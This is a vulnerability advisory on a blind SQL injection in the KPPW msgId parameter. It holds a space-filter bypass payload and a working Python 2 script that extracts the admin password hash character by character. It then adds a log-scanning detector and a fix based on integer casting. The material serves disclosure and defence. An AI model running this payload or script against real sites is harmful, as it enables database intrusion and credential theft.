### Brief description:
KPPW2620150327UTF-8.zip (latest version as of March 27)
### Details:
Url1:
http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1
![图片1.png](https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png)
Url2:
http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1
![图片2.png](https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png)
Url3:
http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2
![图片3.png](https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png)
### Proof of vulnerability:
Comparing the three responses shows that the `msgId` parameter is injectable (boolean-based blind: `&&1=1` keeps the original page, `&&1=2` changes it).
There is some input filtering, but it can be bypassed with inline comments in place of spaces:
&&(select/**/CHAR(48))=SUBSTR((SELECT/**/password/**/from/**/keke_witkey_member/**/WHERE/**/uid=1),1,1)
Verification script (Python 2, uses `httplib`):
```python
#coding:utf-8
# Python 2 script: extracts the password hash of uid=1 one character at a time,
# by checking whether the page still contains a known keyword (true branch).
import httplib

def get(i1, i2):
    # i1: ASCII code being tested; i2: 1-based character position in the hash
    page = ""
    rHtml = httplib.HTTPConnection("localhost", 80, False)
    url = "/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%26(select%2f**%2fCHAR(" + i1 + "))%3dSUBSTR((SELECT%2f**%2fpassword%2f**%2ffrom%2f**%2fkeke_witkey_member%2f**%2fWHERE%2f**%2fuid%3d1)%2c" + i2 + ",1%29"
    #print url
    rHtml.request("GET", url, headers={"User-Agent": "Firefox/22.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cookie": "PHPSESSID=*", "Connection": "keep-alive"})  # set your own session cookie
    page = rHtml.getresponse(False)
    return page.read().count('msgId=73')  # keyword that only appears in the "true" page; choose your own

mm = []
for i in range(1, 33):          # 32 hex characters of the MD5 hash
    for ii in range(48, 123):   # ASCII '0'..'z'
        if get(str(ii), str(i)) != 0:
            mm.append(chr(ii))
            print "".join(mm)
            break
```
Result:
![图片4.png](https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png)
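The following detection logic is an added example written for this writeup, not code from the original report or from the KPPW project. It inspects access-log request lines for the injection pattern described above: it percent-decodes each query value, collapses the `/**/` inline comments used to evade the space filter, and flags any value of a parameter that should be a plain integer (`msgId`, `intPage`, `uid` are assumed here to be integer-only) that is not a pure number, plus any value carrying a boolean tail such as `&&1=1` or `&&(select ...)`. The log lines are constructed samples.

```python
"""Detect boolean-based blind SQL injection attempts in query parameters
that should only ever carry integers (e.g. KPPW's msgId).

Added example for this writeup; the access-log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: these query parameters are meant to be plain integers.
INTEGER_PARAMS = {"msgId", "intPage", "uid"}

# /**/ is a classic substitute for whitespace when spaces are filtered,
# so collapse inline comments before looking at the value.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# A boolean operator followed by a comparison or a sub-select, as in the advisory.
BOOLEAN_TAIL = re.compile(
    r"(&&|\|\||\band\b|\bor\b)\s*\(?\s*(select\b|char\s*\(|substr\s*\(|\d+\s*=\s*\d+)",
    re.IGNORECASE,
)

# Request line inside a common-log-format entry: "GET /path?query HTTP/1.1"
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize(value: str) -> str:
    """Decode one extra layer of percent-encoding and strip comment whitespace."""
    value = unquote(value)
    value = INLINE_COMMENT.sub(" ", value)
    return " ".join(value.split())


def inspect_target(target: str) -> list:
    """Return (param, reason, normalized_value) for every suspicious query value."""
    findings = []
    query = urlsplit(target).query
    # parse_qs already percent-decodes once, so %26%26 becomes a literal && here
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            norm = normalize(raw)
            if name in INTEGER_PARAMS and not norm.isdigit():
                findings.append((name, "non-integer value in integer parameter", norm))
            elif BOOLEAN_TAIL.search(norm):
                findings.append((name, "boolean/sub-select tail", norm))
    return findings


def scan_log(lines) -> list:
    """Return [(line_no, findings)] for log lines whose request target looks injected."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.search(line)
        if not m:
            continue
        findings = inspect_target(m.group("target"))
        if findings:
            hits.append((n, findings))
    return hits


# Constructed sample access-log lines mirroring Url1, Url2 and the script's payload.
SAMPLE_LOG = [
    '127.0.0.1 - - [27/Mar/2015:23:22:06 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [27/Mar/2015:23:22:26 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [27/Mar/2015:23:25:15 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%26(select%2f**%2fCHAR(48))%3dSUBSTR((SELECT%2f**%2fpassword%2f**%2ffrom%2f**%2fkeke_witkey_member%2f**%2fWHERE%2f**%2fuid%3d1)%2c1,1%29 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG):
        for param, reason, value in findings:
            print(f"line {line_no}: {param}: {reason}: {value}")
```

The integer-only check is the robust half of this rule: it needs no signature and catches any non-numeric payload in `msgId`, which is exactly the property a fix should enforce server-side (cast the parameter to an integer or bind it as a typed prepared-statement parameter). The boolean-tail regex is a heuristic for free-text parameters and will need tuning for false positives such as a literal "or" in a search term.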